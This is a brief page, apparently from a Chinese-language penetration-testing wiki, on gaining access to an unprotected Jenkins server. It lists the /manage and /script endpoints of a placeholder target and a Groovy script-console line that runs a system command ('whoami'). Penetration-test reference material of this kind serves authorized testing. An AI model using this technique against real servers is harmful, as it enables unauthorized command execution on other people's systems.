> For the complete documentation index, see [llms.txt](https://www.heresecurity.wiki/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.heresecurity.wiki/chu-shi-fang-wen/wei-shou-quan-fang-wen/jenkins.md).

# Jenkins

```
http://<target>:8080/manage
http://<target>:8080/script
执行系统命令
println "whoami".execute().text
```
